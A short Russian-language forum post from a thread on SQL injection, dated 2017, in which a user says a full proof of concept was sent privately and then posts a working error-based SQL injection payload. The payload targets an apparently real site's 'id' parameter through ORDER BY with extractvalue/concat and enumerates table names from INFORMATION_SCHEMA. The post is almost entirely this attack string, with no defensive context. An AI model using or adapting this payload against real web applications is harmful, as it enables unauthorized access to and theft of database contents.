Тема: SQL - injection.
Показать сообщение отдельно

  #3  
Старый 19.03.2017, 14:36
SooLFaa
Постоянный
Регистрация: 17.03.2014
Сообщений: 530
С нами: 6398966

Репутация: 154


По умолчанию

Как обычно полный РоС выслал в ЛС. А если кому интересно то решается еррор бэйседом в ордер бай.

Код:
site.ru/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()   LIMIT 1,1))) -- -
 
Ответить с цитированием